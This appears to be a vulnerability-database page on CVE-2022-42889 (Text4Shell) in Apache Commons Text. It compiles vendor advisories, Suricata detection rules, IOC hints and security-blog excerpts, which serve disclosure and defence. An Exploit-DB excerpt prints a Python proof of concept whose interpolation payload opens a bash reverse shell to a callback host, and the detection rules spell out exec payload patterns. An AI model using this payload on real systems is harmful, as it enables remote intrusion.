CVE-2022-42889
published 2022-10-13CVE-2022-42889: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
99.93%
100.0th percentile
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | commons_text | >= 1.5 < 1.10.0 | 1.10.0 |
| apache_software_foundation | apache_commons_text | >= 1.5 < Apache Commons Text* | Apache Commons Text* |
| apache_software_foundation | apache_commons_text | unspecified – 1.9 | — |
| debian | commons-text | < commons-text 1.10.0-1 (bookworm) | commons-text 1.10.0-1 (bookworm) |
| juniper | security_threat_response_manager | < 7.5.0 | 7.5.0 |
| juniper | security_threat_response_manager | — | — |
| paloalto | cortex_data | — | — |
| paloalto | cortex_xdr | — | — |
| paloalto | cortex_xpanse | — | — |
| paloalto | cortex_xsoar | — | — |
| paloalto | globalprotect | — | — |
| paloalto | pan-os | — | — |
| paloalto | prisma_access | — | — |
| paloalto | prisma_cloud | — | — |
| paloalto | prisma_sd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect the interpolation payload pattern '${script:...}', '${dns:...}', or '${url:...}' in HTTP request parameters or body — these are the three dangerous lookup prefixes exploited in CVE-2022-42889. ↗
- →Zscaler IPS signature 'Apache.Exploit.CVE-2022-42889' can be used for network-level detection of exploit attempts. ↗
- →Zscaler rule ID 944130 (Suspicious Java Class Detected) covers deserialization-based exploitation attempts related to this CVE. ↗
- →Zscaler rule ID 932130 (Unix Shell Expression Found) covers RCE payload detection for this CVE. ↗
- →The standard exploit payload format is '${prefix:name}' — monitor application inputs and logs for this interpolation pattern, especially with prefixes 'script', 'dns', and 'url'. ↗
- ·Affected versions are strictly 1.5 through 1.9; version 1.10.0 disables the dangerous interpolators by default and is the recommended fix. ↗
- ·This CVE is considered less broadly exploitable than Log4Shell because the Apache Commons Text package and the StringSubstitutor interpolator are not widely used in production environments. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Oracle
Oracle Oracle HealthCare Applications Risk Matrix: FHIR (Apache Commons Text) — CVE-2022-42889
vendor_oracle·2024-04-15·CVSS 9.8
CVE-2022-42889 [CRITICAL] Oracle Oracle HealthCare Applications Risk Matrix: FHIR (Apache Commons Text) — CVE-2022-42889
Oracle Oracle HealthCare Applications Risk Matrix: FHIR (Apache Commons Text) vulnerability
CVE: CVE-2022-42889
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2024 (APR 2024)
Oracle
Oracle Oracle Financial Services Applications Risk Matrix: Application (Apache Commons Text) — CVE-2022-42889
vendor_oracle·2023-04-15·CVSS 9.8
CVE-2022-42889 [CRITICAL] Oracle Oracle Financial Services Applications Risk Matrix: Application (Apache Commons Text) — CVE-2022-42889
Oracle Oracle Financial Services Applications Risk Matrix: Application (Apache Commons Text) vulnerability
CVE: CVE-2022-42889
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2023 (APR 2023)
Oracle
Oracle Oracle Communications Applications Risk Matrix: PSR Designer (Apache Commons Text) — CVE-2022-42889
vendor_oracle·2023-01-15·CVSS 9.8
CVE-2022-42889 [CRITICAL] Oracle Oracle Communications Applications Risk Matrix: PSR Designer (Apache Commons Text) — CVE-2022-42889
Oracle Oracle Communications Applications Risk Matrix: PSR Designer (Apache Commons Text) vulnerability
CVE: CVE-2022-42889
CVSS: 9.8
Protocol: HTTPS
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2023 (JAN 2023)
Palo Alto
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
vendor_paloalto·2022-11-09·CVSS 9.8
CVE-2022-42889 [CRITICAL] CWE-94 CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
CVE-2022-42889 Impact of Apache Text Commons Vulnerability CVE-2022-42889
Palo Alto Networks has evaluated the Apache Commons Text library vulnerability CVE-2022-42889, known as Text4Shell, for all products and services. The Palo Alto Networks Product Security Assurance team has confirmed that all products and services are not impacted by this vulnerability. CVE Summary CVE-2022-42889 Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators
Red Hat
apache-commons-text: variable interpolation RCE
vendor_redhat·2022-10-13·CVSS 9.8
CVE-2022-42889 [CRITICAL] CWE-94 apache-commons-text: variable interpolation RCE
apache-commons-text: variable interpolation RCE
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected v
Debian
CVE-2022-42889: commons-text - Apache Commons Text performs variable interpolation, allowing properties to be d...
vendor_debian·2022·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889: commons-text - Apache Commons Text performs variable interpolation, allowing properties to be d...
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code executio
OSV
CVE-2022-42889: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded
osv·2022-10-13·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code executio
GHSA
Arbitrary code execution in Apache Commons Text
ghsa·2022-10-13
CVE-2022-42889 [CRITICAL] CWE-94 Arbitrary code execution in Apache Commons Text
Arbitrary code execution in Apache Commons Text
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected v
OSV
Arbitrary code execution in Apache Commons Text
osv·2022-10-13
CVE-2022-42889 [CRITICAL] Arbitrary code execution in Apache Commons Text
Arbitrary code execution in Apache Commons Text
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected v
VulnCheck
Apache commons_text Improper Control of Generation of Code ('Code Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-42889 [CRITICAL] Apache commons_text Improper Control of Generation of Code ('Code Injection')
Apache commons_text Improper Control of Generation of Code ('Code Injection')
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolat
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|url|3a|UTF|2d|8|3a|http|3a 2f|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039468; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|script|3a|javascript|3a|java|2e|lang|2e|Runtime|2e|getRuntime|28 29 2e|exec|28|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039465; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updat
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|24 7b|java|3a|version|7d 20 24 7b|script|3a|JEXL|3a 27 27 2e|getClass|28 29 2e|forName|28 27|java|2e|lang|2e|Runtime|27 29 2e|getRuntime|28 29 2e|exec"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,twitter.com/pwntester/status/1582321752566161409; classtype:attempted-admin; sid:2039471; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severit
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|dns|3a|address|7c|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039467; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt JEXL Path (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|24 7b|java|3a|version|7d 20 24 7b|script|3a|JEXL|3a 27 27 2e|getClass|28 29 2e|forName|28 27|java|2e|lang|2e|Runtime|27 29 2e|getRuntime|28 29 2e|exec"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,twitter.com/pwntester/status/1582321752566161409; classtype:attempted-admin; sid:2039470; rev:3; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidenc
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|url|3a|UTF|2d|8|3a|http|3a 2f|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039469; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Client_Endpoint, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|script|3a|javascript|3a|java|2e|lang|2e|Runtime|2e|getRuntime|28 29 2e|exec|28|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039464; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By
Suricata
ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)
suricata·2022-10-19·CVSS 9.8
CVE-2022-42889 [CRITICAL] ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)
ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound)"; flow:established,to_server; http.uri; content:"|3d 24 7b|dns|3a|address|7c|"; fast_pattern; content:"|7d|"; distance:0; reference:cve,2022-42889; reference:url,sysdig.com/blog/cve-2022-42889-text4shell; classtype:attempted-admin; sid:2039466; rev:2; metadata:affected_product Apache_HTTP_server, attack_target Web_Server, created_at 2022_10_19, cve CVE_2022_42889, deployment Perimeter, deployment SSLDecrypt, confidence Low, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_10_24;)
Exploit-DB
Apache Commons Text 1.10.0 - Remote Code Execution
exploitdb·2025-04-18·CVSS 9.8
CVE-2022-42889 [CRITICAL] Apache Commons Text 1.10.0 - Remote Code Execution
Apache Commons Text 1.10.0 - Remote Code Execution
---
# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text ")
print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
sys.exit(1)
if len(sys.argv) != 4:
usage()
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(r
Metasploit
Apache Commons Text RCE
metasploit
Apache Commons Text RCE
Apache Commons Text RCE
This exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the "script", "dns" and "url" lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the "script" key. In order to exploit the vulnerabilities, the following requirements must be met: Run a version of Apache Commons Text from version 1.5 to 1.9 Use the StringSubstitutor interpolator Target should run JDK < 15
Nuclei
Text4Shell - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-42889 [CRITICAL] Text4Shell - Remote Code Execution
Text4Shell - Remote Code Execution
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may b
Qualys
The January 2023 Oracle Critical Patch Update
blogs_qualys·2023-01-18
The January 2023 Oracle Critical Patch Update
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Conclusion
This Oracle Critical Patch Update contains a group of patches for multiple security vulnerabilities that address 327 new security patches. Some of the vulnerabilities addressed this month impact various products. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. We urge customers to apply these time-sensitive Oracle Critical Patch Updates.
During Q1 2023 Oracle Critical Patch Update, the Oracle Communications product suite recorded the highest number of patches at 79, constituting 24% of the total patches released. The Oracle Fusion Middleware and Oracle Communications Applications product lines followed, with 50 and 39 patches, respe
Qualys
The January 2023 Oracle Critical Patch Update | Qualys
blogs_qualys·2023-01-18
The January 2023 Oracle Critical Patch Update | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Conclusion
This Oracle Critical Patch Update contains a group of patches for multiple security vulnerabilities that address 327 new security patches. Some of the vulnerabilities addressed this month impact various products. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. We urge customers to apply these time-sensitive Oracle Critical Patch Updates.
During Q1 2023 Oracle Critical Patch Update, the Oracle Communications product suite recorded the highest number of patches at 79, constituting 24% of the total patches released. The Oracle Fusion Middleware and Oracle Communications Applications product lines followed, with 50 and 39 patches,
Qualys
November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years).
blogs_qualys·2022-11-08·CVSS 7.5
[HIGH] November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years).
## Table of Contents
Microsoft Patch Tuesday Summary
The November 2022 Microsoft Vulnerabilities are Classified as Follows:
OpenSSL 3.x Critical Vulnerability Highlights
OpenSSL 3.x Related Blogs and Resources
Microsoft Addressed Six Zero-Day Vulnerabilities
Microsoft Patch Tuesday Critical Vulnerability Highlights
Microsoft Release Summary
Adobe Security Bulletins and Advisories
About Qualys Patch Tuesday
Qualys Threat Research Blog Posts
Qualys Threat Protection High-Rated Advisories
Discover and Prioritize Vulnerabilities in Vulnerability Management Detection Response(VMDR)
Rapid Response with Patch Management (PM)
Extend the Power of VMDR to Enterprise Mobile Devices With Qualys VMDR Mobile
Execute Mitigation UsingCustom Assessment and Remediation(CAR)
Patch Tuesday Is
Qualys
November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years). | Qualys
blogs_qualys·2022-11-08·CVSS 7.5
[HIGH] November 2022 Patch Tuesday | Microsoft Releases 65 New Vulnerabilities With 10 Critical; Adobe Releases Zero Advisories (for the First Time in Six Years). | Qualys
#### Table of Contents
- Microsoft Patch Tuesday Summary
- The November 2022 Microsoft Vulnerabilities are Classified as Follows:
- OpenSSL 3.x Critical Vulnerability Highlights
- OpenSSL 3.x Related Blogs and Resources
- Microsoft Addressed Six Zero-Day Vulnerabilities
- Microsoft Patch Tuesday Critical Vulnerability Highlights
- Microsoft Release Summary
- Adobe Security Bulletins and Advisories
- About Qualys Patch Tuesday
- Qualys Threat Research Blog Posts
- Qualys Threat Protection High-Rated Advisories
- Discover and Prioritize Vulnerabilities in Vulnerability Management Detection Response(VMDR)
- Rapid Response with Patch Management (PM)
- Extend the Power of VMDR to Enterprise Mobile Devices With Qualys VMDR Mobile
- Execute Mitigation UsingCustom Assessment and Remediation(CAR)
Qualys
Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform
blogs_qualys·2022-10-27·CVSS 9.8
[CRITICAL] Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform
## Table of Contents
About Apache Common Text
Potential Impact of Text4Shell Vulnerability
Discover Vulnerable Assets Using Qualys CyberSecurity Asset Management (CSAM)
Tagging Vulnerable Assets Using Qualys CyberSecurity Asset Management (CSAM)
Discover Vulnerable Assets Using Qualys Vulnerability Management Detection and Response (VMDR)
Windows Out-of-Band Detection for Text4Shell
Execute the Detection Utility with Qualys Custom Assessment and Remediation (CAR)
Gain exposure visibility and remediation tracking with Text4Shell Unified Dashboard
Contributors:
On 2022-10-13, Apache Security Team disclosed a critical vulnerability with CVE-2022-42889 affecting the popular Apache Commons Text library. This vulnerability is popularly named “ Text4Shell ” which when exploited can allo
Qualys
Text4Shell: Detect, Prioritize and Remediate The Risk Across All Environments | Qualys
blogs_qualys·2022-10-27·CVSS 9.8
[CRITICAL] Text4Shell: Detect, Prioritize and Remediate The Risk Across All Environments | Qualys
#### Table of Contents
- About Apache Common Text
- Potential Impact of Text4Shell Vulnerability
- Discover Vulnerable Assets Using Qualys CyberSecurity Asset Management (CSAM)
- Tagging Vulnerable Assets Using Qualys CyberSecurity Asset Management (CSAM)
- Discover Vulnerable Assets Using Qualys Vulnerability Management Detection and Response (VMDR)
- Windows Out-of-Band Detection for Text4Shell
- Execute the Detection Utility with Qualys Custom Assessment and Remediation (CAR)
- Gain exposure visibility and remediation tracking with Text4Shell Unified Dashboard
- Contributors:
On 2022-10-13, Apache Security Team disclosed a critical vulnerability with CVE-2022-42889 affecting the popular Apache Commons Text library. This vulnerability is popularly named “Text4Shell” which when exploite
Qualys
CVE-2022-42889: Detect Text4Shell via Qualys Container Security
blogs_qualys·2022-10-25·CVSS 9.8
CVE-2022-42889 [CRITICAL] CVE-2022-42889: Detect Text4Shell via Qualys Container Security
## Table of Contents
How to Detect Text4Shell Vulnerability via Qualys Container Security
Patch the Images
A new critical vulnerability CVE-2022-42889 (Text4Shell) in Apache Commons Text library was reported by Alvaro Muñoz .
The vulnerability, when exploited could result in remote code execution (RCE) applied to untrusted input due to insecure interpolation defaults. As a result, this CVE is rated at CVSS v3 score of 9.8.
The affected Apache Commons Text versions are 1.5 to 1.9 and it has been patched in version 1.10. When this article is published, this CVE is not expected to be highly widespread as compared to the Log4Shell and Spring4Shell-related CVEs. The fact is that the Apache Common Text package and the use of the specific function StringSubstitutor interpolator are not widel
Qualys
CVE-2022-42889: Detect Text4Shell via Qualys Container Security | Qualys
blogs_qualys·2022-10-25·CVSS 9.8
CVE-2022-44889 [CRITICAL] CVE-2022-42889: Detect Text4Shell via Qualys Container Security | Qualys
#### Table of Contents
- How to Detect Text4Shell Vulnerability via Qualys Container Security
- Patch the Images
A new critical vulnerability CVE-2022-42889 (Text4Shell) in Apache Commons Text library was reported by Alvaro Muñoz.
The vulnerability, when exploited could result in remote code execution (RCE) applied to untrusted input due to insecure interpolation defaults. As a result, this CVE is rated at CVSS v3 score of 9.8.
The affected Apache Commons Text versions are 1.5 to 1.9 and it has been patched in version 1.10. When this article is published, this CVE is not expected to be highly widespread as compared to the Log4Shell and Spring4Shell-related CVEs. The fact is that the Apache Common Text package and the use of the specific function StringSubstitutor interpolator are not w
Checkpoint
24th October – Threat Intelligence Report
blogs_checkpoint·2022-10-24
CVE-2022-22954 24th October – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 24th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 24th October, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Iranian Hacktivist group ‘Black Reward’ claim to have breached Iran’s government and exfiltrated data related to the country’s nuclear program. After the group’s demands to release political prisoners were not met, the group eventually released 50GB of allegedly sensitive data. Iran’s nuclear agency confirmed the breach,
Zscaler
Apache Commons Text Remote Code Execution Vulnerability
blogs_zscaler·2022-10-18·CVSS 9.8
[CRITICAL] Apache Commons Text Remote Code Execution Vulnerability
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Zscaler
CISO Monthly Roundup, October 2022: ThreatLabz Data Loss Report; PHP Ducktail infostealer; LilithBot malware; vulnerabilities in OpenSSL, Microsoft, and Apache; Windows CLFS zero-day | CXO Revolutiona
blogs_zscaler
CISO Monthly Roundup, October 2022: ThreatLabz Data Loss Report; PHP Ducktail infostealer; LilithBot malware; vulnerabilities in OpenSSL, Microsoft, and Apache; Windows CLFS zero-day | CXO Revolutiona
## CISO Monthly Roundup, October 2022: ThreatLabz Data Loss Report; PHP Ducktail infostealer; LilithBot malware; vulnerabilities in OpenSSL, Microsoft, and Apache; Windows CLFS zero-day
Deepen Desai
Contributor
